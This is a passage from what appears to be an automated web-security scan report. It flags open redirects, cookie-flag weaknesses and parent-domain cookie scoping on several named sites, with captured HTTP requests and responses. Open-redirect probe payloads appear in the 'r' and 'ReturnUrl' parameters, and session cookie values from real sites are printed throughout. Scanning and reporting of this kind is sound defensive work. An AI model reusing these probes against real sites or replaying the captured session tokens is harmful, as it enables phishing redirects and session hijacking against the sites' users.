s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_ppv=0; s_sq=%5B%5BB%5D%5D
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> My Account-West&n ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Membership/LogOn?returnurl=%2Fmsn%2FLoggedIn HTTP/1.1 Host: secure.bundle.com Connection: keep-alive Referer: https://secure.bundle.com/msn Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=1.1303843206.1.1.utmcsr=money.msn.com|utmccn=(referral)|utmcmd=referral|utmcct=/taxes/; __utma=1.2122043951.1303843206.1303843206.1303843206.1; __utmc=1; __utmb=1.2.10.1303843206; SESSIONID=h50b1r45qzwyxs34b22hzjzc; rfr=none%7CBundle%3A%20The%20No.%201%20Source%20for%20How%20People%20Spend%20and%20Save%20Money%20--%20Personal%20Finance%20Data%2C%20Money%20Advice%2C%20Trends%2C%20News%20and%20Community%3A%20https%3A%2F%2Fsecure.bundle.com%2Fmsn
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /services/nocache/Membership/UpdateAuthenticationStateToClient HTTP/1.1 Host: secure.bundle.com Connection: keep-alive Referer: https://secure.bundle.com/msn User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=1.1303843206.1.1.utmcsr=money.msn.com|utmccn=(referral)|utmcmd=referral|utmcct=/taxes/; __utma=1.2122043951.1303843206.1303843206.1303843206.1; __utmc=1; __utmb=1.2.10.1303843206
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /accounttools/public/askUserId.do?usage=forgot HTTP/1.1 Host: www.bcbst.com Connection: keep-alive Referer: http://www.bcbst.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660; WT_FPC=id=173.193.214.243-104623456.30147664:lv=1303849513702:ss=1303849513702
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /inc/loginform.asp?t=0.3263980813790113 HTTP/1.1 Host: www.bcbst.com Connection: keep-alive Referer: https://www.bcbst.com/secure/public/login.asp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660; JSESSIONID=0000l6JFMG0zkOQi8ALpYNU9n7W:148u7ts85; NSC_xxx.cdctu.dpn!443=ffffffff099f143645525d5f4f58455e445a4a42378b; Calling_URL=https://www.bcbst.com:443/accounttools/; WT_FPC=id=173.193.214.243-104623456.30147664:lv=1303849577495:ss=1303849513702
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /secure/public/login.asp HTTP/1.1 Host: www.bcbst.com Connection: keep-alive Referer: https://www.bcbst.com/secure/public/InvalidAccess.shtm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660; JSESSIONID=0000l6JFMG0zkOQi8ALpYNU9n7W:148u7ts85; NSC_xxx.cdctu.dpn!443=ffffffff099f143645525d5f4f58455e445a4a42378b; Calling_URL=https://www.bcbst.com:443/accounttools/; WT_FPC=id=173.193.214.243-104623456.30147664:lv=1303849577495:ss=1303849513702
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /FusionVM/ HTTP/1.1 Host: www.fusionvm.com Connection: keep-alive Referer: http://www.criticalwatch.com/vulnerability-management.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; ASPSESSIONIDQSSATBSQ=OACBHAADIBHEEHNBJFIKBAHA
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://www.fusionvm.com/FusionVM/DesktopDefault.aspx">here</a>.</h2> </body></html>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta c ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta c ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://west.thomson.com/store/secure/ShippingInfo.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=220 ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /accounttools/ HTTP/1.1 Host: www.bcbst.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660; JSESSIONID=0000l6JFMG0zkOQi8ALpYNU9n7W:148u7ts85; NSC_xxx.cdctu.dpn!443=ffffffff099f143645525d5f4f58455e445a4a42378b; WT_FPC=id=173.193.214.243-104623456.30147664:lv=1303849539512:ss=1303849513702
<a class="cstmBtnText" href="https://secure2.convio.net/aac/site/Donation2?df_id=2184&PROXY_ID=24880&PROXY_TYPE=22&FR_ID=1110&JServSessionIdr004=839fd626r1.app209a">Support Team Freddie Mercury!</a> ...[SNIP]... </dl>
<a href="https://secure2.convio.net/aac/site/Donation2?df_id=2184&PROXY_ID=24880&PROXY_TYPE=22&FR_ID=1110&JServSessionIdr004=839fd626r1.app209a" title="Make a gift to support Team Freddie Mercury"> Make a gift! </a> ...[SNIP]...
The value of the r request parameter is used to perform an HTTP redirect. The payload http%3a//a553a9843e836a584/a%3f was submitted in the r parameter. This caused a redirection to the following URL:
http://a553a9843e836a584/a?
Request
GET /a/bpix?adv=652&id=1561&format=image&r=http%3a//a553a9843e836a584/a%3f HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_1yvt=jxb%3Aafuq%3A1; rth=2-ljzkpb-jxb~afuq~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-
The value of the ReturnUrl request parameter is used to perform an HTTP redirect. The payload http%3a//a1a5b9bd6bfb8fd5d/a%3fhttps%3a//myaccount.west.thomson.com/MyAccount/AccessControl/AccessControl/SignIn%3fReturnUrl%3dhttp%3a//myaccount.west.thomson.com/MYACCOUNT/default.aspx%3fReturnUrl%3d/MyAccount/Common/Landing/MyAccountLanding%3fpromcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless%26promcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless was submitted in the ReturnUrl parameter. This caused a redirection to the following URL:
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://a1a5b9bd6bfb8fd5d/a?https://myaccount.west.thomson.com/MyAccount/AccessControl/AccessControl/SignIn?ReturnUrl= ...[SNIP]...
13. Cookie scoped to parent domain
There are 108 instances of this issue:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /services/nocache/Membership/UpdateAuthenticationStateToClient HTTP/1.1 Host: secure.bundle.com Connection: keep-alive Referer: https://secure.bundle.com/msn User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=1.1303843206.1.1.utmcsr=money.msn.com|utmccn=(referral)|utmcmd=referral|utmcct=/taxes/; __utma=1.2122043951.1303843206.1303843206.1303843206.1; __utmc=1; __utmb=1.2.10.1303843206
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss HTTP/1.1 Host: www.computerworlduk.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mm//PHOE//lpg?nm=LandngPg&s0=&s1=&s2=&v0=&v1=&v2=&ri=[RandomNumber] HTTP/1.1 Host: action.mathtag.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1676624;type=count339;cat=landi852;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=485052303411.0665? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=9:1303494339|3:1303506763|2:1303506773|5:1303494463|10001:1303152836|1:1303494357; ts=1303851733
Response
HTTP/1.1 200 OK Server: mt2/2.0.17.4.1542 Apr 2 2011 16:34:52 ewr-pixel-n1a pid 0x6299 25241 Content-Type: image/gif P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Date: Tue, 26 Apr 2011 21:02:15 GMT Etag: 4dab7d35-b1d2-915a-d3c0-9d57f9c66b07 Set-Cookie: ts=1303851735; domain=.mathtag.com; path=/; expires=Wed, 25-Apr-2012 21:02:15 GMT Content-Length: 43 Accept-Ranges: bytes Cache-Control: no-store Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: Keep-Alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /click%3Bh%3Dv8/3af5/17/be/%2a/c%3B232789996%3B3-0%3B0%3B56669790%3B3454-728/90%3B38954353/38972110/2%3B%3B~sscs%3D%3fhttp://www.aptm.phoenix.edu/?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://www.aptm.phoenix.edu/?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 Set-Cookie: id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; path=/; domain=.doubleclick.net; expires=Tue, 16 Apr 2013 20:37:40 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Tue, 26 Apr 2011 18:45:00 GMT Server: GFE/2.0 Content-Type: text/html
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/bpix?adv=652&id=1561&format=image&r= HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_1yvt=jxb%3Aafuq%3A1; rth=2-ljzkpb-jxb~afuq~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/bpix?adv=652&id=1561&format=image&r= HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_9j36=jxb%3Aaftr%3A1; rth=2-ljzkpb-jxb~aftr~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/bpix?adv=652&id=1561&format=image&r= HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_2o6=jxb%3Aag84%3A1; rth=2-ljzkpb-jxb~ag84~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/bpix?adv=652&id=1561&format=image&r= HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_6mee=jxb%3Aaf0m%3A1; T_47z9=jxb%3Aaf0m%3A1; rth=2-ljzkpb-jxb~af0m~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/bpix?adv=652&id=1561&format=image&r= HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306&browse_products=160547 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_eel0=eo7%3A861h%3A1; rth=2-ljzkpb-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/bpix?adv=652&id=1561&format=image&r= HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_fk5h=jxb%3Aaf0c%3A1; rth=2-ljzkpb-jxb~af0c~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/bpix?adv=652&id=1561&format=image&r= HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_fk5h=jxb%3Aaf0c%3A1; rth=2-ljzkpb-jxb~af0c~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /mapuid?member=181&user=CAESEAYDROJIBlXAxjjwOAYYXzI&cver=1 HTTP/1.1 Host: adx.adnxs.com Proxy-Connection: keep-alive Referer: http://mediacdn.disqus.com/1303851120/build/system/def.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=ChIImdYCEAoYASABKAEw2qLc7QQQ2qLc7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG10Qgj[2<?0P(*AuB-u**g1:XICajEhzW()U9M1kUGf3$2.f0R>9.aclgdU%p3G.wsgA#5B^/y'*AHKwd-Wc/<vf>ixo=/N^ErmW.7[DPyOU^$+=btOVCb1#5mb1HtSskQ$#DX%p1anmQi))(EM:>@>i%8Erm#VQ=y1kR1I/m[-YAD8)MvNO9-KB/M=Ph3Gg0XnXoLwvH(1F$*vhmR$21+4gnIPa8ZQ96*JoaM`+tGx4)P'kOBSQ:TDf>[)JB]jN^AZA:`:L7xDM@.[obo(c'Vh#EyvU0In#NhZm]%(05D.!:agr)t[VjlG[PhG1CflaNaIM'U.!TFd(icoIMFD8Ep.IUtn=Zi@9>+M68OhQI0Z*^@!9d[@Qn^sMS^=3<0=o1N6p(m049Jmn`V9t>QhMj!HjDiz3g9e?Iibma^P.CI!sni1i^r+(]67Kw%hg9mr`R>z1NK)67z`.JhV2MJzq$a4wGN/ABy=5j2Xne?bDXi/Su11aLdm/AGUaZ#ErKYEsY^e1(Fc?>]=o<'':M4=2#H)DhRCw#R0T!2U@I</wZn
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 21:51:18 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 21:51:18 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 21:51:18 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 21:51:18 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG10Qgj[2<?0P(*AuB-u**g1:XICajEhzW()U9M1kUGf3$2.f0R>9.aclgdU%p3G.wsgA#5B^/y'*AHKwd-Wc/<vf>ixo=/N^ErmW.7[DPyOU^$+=btOVCb1#5mb1HtSskQ$#DX%p1anmQi))(EM:>@>i%8Erm#VQ=y1kR1I/m[-YAD8)MvNO9-KB/M=Ph3Gg0XnXoLwvH(1F$*vhmR$21+4gnIPa8ZQ96*JoaM`+tGx4)P'kOBSQ:TDf>[)JB]jN^AZA:`:L7xDM@.[obo(c'Vh#EyvU0In#NhZm]%(05D.!:agr)t[VjlG[PhG1CflaNaIM'U.!TFd(icoIMFD8Ep.IUtn=Zi@9>+M68OhQI0Z*^@!9d[@Qn^sMS^=3<0=o1N6p(m049Jmn`V9t>QhMj!HjDiz3g9e?Iibma^P.CI!sni1i^r+(]67Kw%hg9mr`R>z1NK)67z`.JhV2MJzq$a4wGN/ABy=5j2Xne?bDXi/Su11aLdm/AGUaZ#ErKYEsY^e1(Fc?>]=o<'':M4=2#H)DhRCw#R0T!2U@I</wZn; path=/; expires=Mon, 25-Jul-2011 21:51:18 GMT; domain=.adnxs.com; HttpOnly Content-Length: 43 Content-Type: image/gif Date: Tue, 26 Apr 2011 21:51:18 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ad/js/15902-126860-34879-0?mpt=4926950&mpvc=http://ad.uk.doubleclick.net/click%3Bh%3Dv8/3af5/3/0/%2a/u%3B240165093%3B0-0%3B0%3B50681866%3B4252-336/280%3B41773561/41791348/1%3B%3B%7Esscs%3D%3f HTTP/1.1 Host: altfarm.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=822523287793; mojo2=16228:26209; mojo3=10105:2060/14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
